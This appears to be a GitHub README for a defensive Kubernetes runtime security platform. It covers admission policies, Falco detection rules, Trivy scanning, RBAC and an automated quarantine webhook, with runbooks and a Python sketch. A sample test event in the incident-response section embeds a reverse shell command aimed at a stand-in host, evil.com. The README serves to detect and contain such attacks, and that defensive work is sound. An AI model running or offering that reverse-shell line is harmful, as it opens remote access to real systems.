effieksa/k8s-security-platform

GitHub: effieksa/k8s-security-platform

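A production-grade Kubernetes runtime security platform for EKS that combines admission control, threat detection, vulnerability scanning, and automated response, covering CIS/NIST/PCI DSS compliance requirements.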


# Kubernetes Security Platform

[![Falco](https://img.shields.io/badge/Runtime_Security-Falco_0.37-00AEF3?logo=falco)](https://falco.org/)
[![OPA](https://img.shields.io/badge/Admission_Control-OPA_Gatekeeper-4B5EC2?logo=openpolicyagent)](https://open-policy-agent.github.io/gatekeeper/)
[![Kyverno](https://img.shields.io/badge/Policy_Engine-Kyverno-0059A1)](https://kyverno.io/)
[![Trivy](https://img.shields.io/badge/Vulnerability_Scan-Trivy_Operator-1904DA)](https://trivy.dev/)
[![MITRE](https://img.shields.io/badge/Framework-MITRE_ATT%26CK-red)](https://attack.mitre.org/matrices/enterprise/containers/)
[![CIS](https://img.shields.io/badge/Benchmark-CIS_Kubernetes_1.8-blue)](https://www.cisecurity.org/benchmark/kubernetes)

A production-grade Kubernetes runtime security platform for EKS. It implements defense in depth across admission control, runtime threat detection, continuous vulnerability scanning, and automated incident response, mapped to MITRE ATT&CK for Containers, CIS Kubernetes Benchmark 1.8, NIST 800-53, and PCI DSS.

## Security Architecture

Most container security focuses on the CI/CD pipeline: images are scanned before they are deployed. This platform covers what happens **after** deployment: detecting threats at runtime, enforcing policy at admission, continuously scanning running workloads, and responding to incidents automatically.

```
┌─────────────────────────────────────────────────────────────────────┐
│                       DEFENSE IN DEPTH LAYERS                       │
│                                                                     │
│  Layer 1 - ADMISSION CONTROL (prevent bad configs entering cluster) │
│  ┌────────────────────────┐  ┌──────────────────────────────────┐   │
│  │  OPA Gatekeeper        │  │  Kyverno                         │   │
│  │  - No privileged pods  │  │  - Verify Cosign signatures      │   │
│  │  - Approved registries │  │  - Disallow :latest tag          │   │
│  │  - Required labels     │  │  - Drop ALL capabilities         │   │
│  │  - Resource limits     │  │  - Require seccomp profile       │   │
│  │  - Non-root required   │  │  - Auto-generate NetworkPolicies │   │
│  └────────────────────────┘  └──────────────────────────────────┘   │
│                                                                     │
│  Layer 2 - RUNTIME DETECTION (detect threats in running containers) │
│  ┌─────────────────────────────────────────────────────────────┐    │
│  │  Falco (eBPF-based, every node via DaemonSet)               │    │
│  │  - Crypto mining processes               MITRE T1496        │    │
│  │  - Reverse shell attempts                MITRE T1059        │    │
│  │  - Container privilege escalation        MITRE T1611        │    │
│  │  - Sensitive file access                 MITRE T1552        │    │
│  │  - Package manager execution             MITRE T1190        │    │
│  │  - Network scanning tools                MITRE T1046        │    │
│  │  - kubectl exec detection                MITRE T1609        │    │
│  │  - K8s API anomalies (anonymous access, secret reads)       │    │
│  └─────────────────────────────────────────────────────────────┘    │
│                                                                     │
│  Layer 3 - CONTINUOUS SCANNING (catch new CVEs post-deployment)     │
│  ┌─────────────────────────────────────────────────────────────┐    │
│  │  Trivy Operator (scans all running workloads continuously)  │    │
│  │  - VulnerabilityReport per workload                         │    │
│  │  - ConfigAuditReport (K8s misconfigurations)                │    │
│  │  - ExposedSecretReport (secrets in images)                  │    │
│  │  - RbacAssessmentReport                                     │    │
│  │  - Prometheus metrics → alerts on new CRITICAL CVEs         │    │
│  └─────────────────────────────────────────────────────────────┘    │
│                                                                     │
│  Layer 4 - AUTOMATED RESPONSE (contain threats faster than humans)  │
│  ┌─────────────────────────────────────────────────────────────┐    │
│  │  Falco → Falco Sidekick → auto-response.py webhook          │    │
│  │  - Label pod as quarantined                                 │    │
│  │  - Apply network isolation (deny all ingress/egress)        │    │
│  │  - Capture forensic snapshot → S3                           │    │
│  │  - Alert Slack + PagerDuty with full context                │    │
│  │  - Optionally delete pod (restart from clean image)         │    │
│  └─────────────────────────────────────────────────────────────┘    │
│                                                                     │
│  Layer 5 - AUDIT & COMPLIANCE                                       │
│  ┌─────────────────────────────────────────────────────────────┐    │
│  │  Kubernetes Audit Policy + RBAC Hardening                   │    │
│  │  - Captures secret access, exec, privilege escalation       │    │
│  │  - Least-privilege roles: security-auditor, developer,      │    │
│  │    cicd-deployer, incident-responder                        │    │
│  │  - Prometheus alerts on RBAC anomalies                      │    │
│  └─────────────────────────────────────────────────────────────┘    │
└─────────────────────────────────────────────────────────────────────┘
```

## Compliance Coverage

| Control | CIS K8s 1.8 | NIST 800-53 | PCI DSS | MITRE ATT&CK |
|---|---|---|---|---|
| No privileged containers | 5.2.1 | AC-6 | 2.2 | T1611 |
| Non-root containers | 5.2.6 | AC-6 | 2.2 | T1548 |
| Read-only root filesystem | 5.2.8 | CM-7 | 2.2 | T1070 |
| Drop all capabilities | 5.2.9 | AC-6 | 2.2 | T1548 |
| Approved registries only | - | CM-7 | 6.3 | T1525 |
| Required labels | - | CM-8 | - | - |
| Network policies | 5.3.2 | SC-7 | 1.3 | T1046 |
| Crypto mining detection | - | SI-4 | 11.4 | T1496 |
| Shell spawn detection | - | SI-4 | 11.4 | T1059 |
| Secret access auditing | 3.2.1 | AU-2 | 10.2 | T1552 |
| Privilege escalation detection | - | AU-2 | 10.2 | T1611 |
| Least-privilege RBAC | 5.1.1 | AC-6 | 7.1 | - |
| Audit logging | 3.2.1 | AU-2 | 10.2 | - |
| Continuous CVE scanning | - | SI-2 | 6.3 | - |
| Image signature verification | - | CM-14 | 6.3 | T1525 |

## Repository Structure

```
k8s-security-platform/
+-- README.md
+-- falco/
|   +-- rules/enterprise-rules.yaml          # 15 custom MITRE-mapped detection rules
|   +-- config/falco-values.yaml             # Falco + Sidekick Helm config
+-- gatekeeper/
|   +-- constraint-templates/templates.yaml  # 7 Rego policy templates
|   +-- constraints/constraints.yaml         # Constraint instances + exemptions
+-- kyverno/
|   +-- policies/policies.yaml               # Cosign verification, capabilities, seccomp
+-- trivy-operator/
|   +-- values.yaml                          # Continuous CVE scanning config
+-- rbac/
|   +-- rbac.yaml                            # Least-privilege roles + bindings
+-- audit/
|   +-- audit-policy.yaml                    # K8s audit policy (API server)
+-- alerting/
|   +-- prometheus/security-alerts.yaml      # Prometheus security alert rules
+-- scripts/
|   +-- bootstrap.sh                         # One-command cluster security setup
|   +-- auto-response.py                     # Automated incident response webhook
```

## Quick Start

### Install everything with one command:

```
./scripts/bootstrap.sh \
  --cluster-name my-eks-cluster \
  --region us-east-1 \
  --slack-webhook https://hooks.slack.com/services/xxx/yyy/zzz
```

### Or install components individually:

```
# Add the Helm chart repositories used below (skip any you already have)
helm repo add gatekeeper https://open-policy-agent.github.io/gatekeeper/charts
helm repo add kyverno https://kyverno.github.io/kyverno/
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo add aqua https://aquasecurity.github.io/helm-charts/
helm repo update

# OPA Gatekeeper
helm upgrade --install gatekeeper gatekeeper/gatekeeper \
  -n gatekeeper-system --create-namespace \
  --set replicas=3 --wait
kubectl apply -f gatekeeper/constraint-templates/templates.yaml
sleep 15  # Wait for CRDs
kubectl apply -f gatekeeper/constraints/constraints.yaml

# Kyverno
helm upgrade --install kyverno kyverno/kyverno \
  -n kyverno --create-namespace --wait
kubectl apply -f kyverno/policies/policies.yaml

# Falco
helm upgrade --install falco falcosecurity/falco \
  -n falco --create-namespace \
  --values falco/config/falco-values.yaml --wait

# Trivy Operator
helm upgrade --install trivy-operator aqua/trivy-operator \
  -n trivy-system --create-namespace \
  --values trivy-operator/values.yaml --wait

# RBAC + Audit
kubectl apply -f rbac/rbac.yaml
kubectl apply -f alerting/prometheus/security-alerts.yaml
```

## Verifying the Platform

### Check that Gatekeeper is enforcing policies:

```
# Try to deploy a privileged pod; it should be rejected
kubectl run privileged-test \
  --image=nginx \
  --overrides='{"spec":{"containers":[{"name":"nginx","image":"nginx","securityContext":{"privileged":true}}]}}'
# Expected: Error from server: admission webhook denied

# Check all constraints
kubectl get constraints
kubectl describe k8snoprivilegedcontainer no-privileged-containers
```

### Trigger a Falco rule for testing:

```
# Spawn a shell in a container (triggers the "Shell Spawned in Container" rule)
kubectl run test-pod --image=ubuntu --restart=Never --command -- sleep 3600
kubectl exec test-pod -- /bin/bash -c "echo test"

# Watch Falco events (the Falco Helm chart labels its pods app.kubernetes.io/name=falco)
kubectl logs -n falco -l app.kubernetes.io/name=falco --tail=20 -f
```

### Check Trivy vulnerability reports:

```
# List all vulnerability reports
kubectl get vulnerabilityreports -A

# Get details for a specific workload
kubectl describe vulnerabilityreport <report-name> -n devsecops-prod

# Find all CRITICAL CVEs in the cluster
kubectl get vulnerabilityreports -A -o json | \
  jq '.items[] | select(.report.summary.criticalCount > 0) |
      {namespace: .metadata.namespace, name: .metadata.name, critical: .report.summary.criticalCount}'
```

## Falco Rules Reference

| Rule | MITRE Tactic | MITRE Technique | Priority |
|---|---|---|---|
| Crypto Mining Process Detected | Impact | T1496 | CRITICAL |
| Reverse Shell Attempt | Execution | T1059 | CRITICAL |
| Exec into Running Container | Lateral Movement | T1609 | CRITICAL |
| Privileged Pod Created | Privilege Escalation | T1611 | CRITICAL |
| Anonymous Access to K8s API | Initial Access | T1190 | CRITICAL |
| Container Privilege Escalation | Privilege Escalation | T1611 | HIGH |
| Sensitive File Access | Credential Access | T1552 | HIGH |
| Shell Spawned in Container | Execution | T1059 | HIGH |
| Network Scanning Tool Detected | Discovery | T1046 | HIGH |
| Log File Deletion | Defense Evasion | T1070 | HIGH |
| Setuid/Setgid Bit Set | Privilege Escalation | T1548 | HIGH |
| K8s Secret Accessed by Unexpected User | Credential Access | T1552 | HIGH |
| Service Account Token Read | Credential Access | T1552 | MEDIUM |
| Package Manager Executed | Execution | T1190 | MEDIUM |

## Automated Incident Response

When Falco detects a CRITICAL event, the response webhook:

1. **Labels the pod** with `security.enterprise.com/quarantined: true`
   - Immediately removes it from Service endpoints (traffic stops)
   - Makes the compromise visible in `kubectl get pods`
2. **Applies an isolating NetworkPolicy** that denies all traffic to and from the pod
3. **Captures a forensic snapshot** (full pod spec, last 500 log lines, K8s events) and stores it in S3 with KMS encryption
4. **Alerts Slack + PagerDuty** with full context (pod, image, command, namespace)
5. **Optionally deletes the pod** (set `AUTO_DELETE_PODS=true`); K8s restarts it from a clean image

```
# Run the response webhook locally for testing
export SLACK_TOKEN=xoxb-...
export S3_FORENSICS_BUCKET=my-forensics-bucket
python3 scripts/auto-response.py --server --port 9090

# Test it with a sample event
curl -X POST http://localhost:9090/falco \
  -H "Content-Type: application/json" \
  -d '{"rule":"Reverse Shell Attempt","priority":"CRITICAL","output_fields":{"k8s.pod.name":"test-pod","k8s.ns.name":"default","container.image.repository":"nginx","proc.cmdline":"bash -i >& /dev/tcp/evil.com/4444 0>&1"}}'
```

## Runbook

### Investigating a Falco CRITICAL alert

```
# 1. Find quarantined pods
kubectl get pods -A -l security.enterprise.com/quarantined=true

# 2. Get the quarantine reason
kubectl get pod <pod-name> -n <namespace> \
  -o jsonpath='{.metadata.annotations}'

# 3. Fetch the forensic logs from S3
aws s3 ls s3://forensics-bucket/falco-events/ --recursive
aws s3 cp s3://forensics-bucket/falco-events///.json /tmp/forensics.json
cat /tmp/forensics.json | jq .

# 4. After the investigation: remove the quarantine and delete the pod
kubectl delete networkpolicy quarantine- -n <namespace>
kubectl delete pod <pod-name> -n <namespace>
```

### Checking OPA policy violations in the cluster

```
kubectl get constraintpodstatuses -A
kubectl describe k8sallowedrepos approved-registries-only
```

### Viewing Trivy reports for a namespace

```
kubectl get vulnerabilityreports -n <namespace> -o wide
kubectl get configauditreports -n <namespace> -o wide
```

## License

MIT
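
## Appendix: Quarantine Sketch

The first two response steps described under automated incident response (labeling the pod and applying a deny-all NetworkPolicy) can be illustrated with a small, cluster-free sketch. This is not the code in `scripts/auto-response.py`. The function name `build_quarantine_actions`, the policy name `quarantine-<pod>`, and the shape of the returned dictionary are assumptions made for illustration. Only the label key and the Falco event fields come from this README. The sketch builds the objects a webhook could send to the Kubernetes API and does not talk to a cluster.

```python
import json
from typing import Optional

# Label key taken from the README; everything else below is a hypothetical sketch.
QUARANTINE_LABEL = "security.enterprise.com/quarantined"


def build_quarantine_actions(event: dict) -> Optional[dict]:
    """Return a label patch and deny-all NetworkPolicy for a CRITICAL event, else None."""
    fields = event.get("output_fields") or {}
    pod = fields.get("k8s.pod.name")
    namespace = fields.get("k8s.ns.name")

    # Only CRITICAL events that identify a pod and namespace lead to quarantine.
    if str(event.get("priority", "")).upper() != "CRITICAL" or not pod or not namespace:
        return None

    # Merge-patch body that adds the quarantine label to the pod.
    label_patch = {"metadata": {"labels": {QUARANTINE_LABEL: "true"}}}

    # Listing both policy types with no ingress/egress rules denies all traffic
    # for the selected pods. The policy name is an assumed convention.
    network_policy = {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": f"quarantine-{pod}", "namespace": namespace},
        "spec": {
            "podSelector": {"matchLabels": {QUARANTINE_LABEL: "true"}},
            "policyTypes": ["Ingress", "Egress"],
        },
    }
    return {
        "pod": pod,
        "namespace": namespace,
        "label_patch": label_patch,
        "network_policy": network_policy,
    }


if __name__ == "__main__":
    # Trimmed version of the sample event used in the curl test in this README.
    sample_event = {
        "rule": "Reverse Shell Attempt",
        "priority": "CRITICAL",
        "output_fields": {"k8s.pod.name": "test-pod", "k8s.ns.name": "default"},
    }
    print(json.dumps(build_quarantine_actions(sample_event), indent=2))
```

Because the policy selects on the quarantine label rather than on a single pod, it isolates every labeled pod in the namespace. That is one possible design choice and may differ from what the repository's script does.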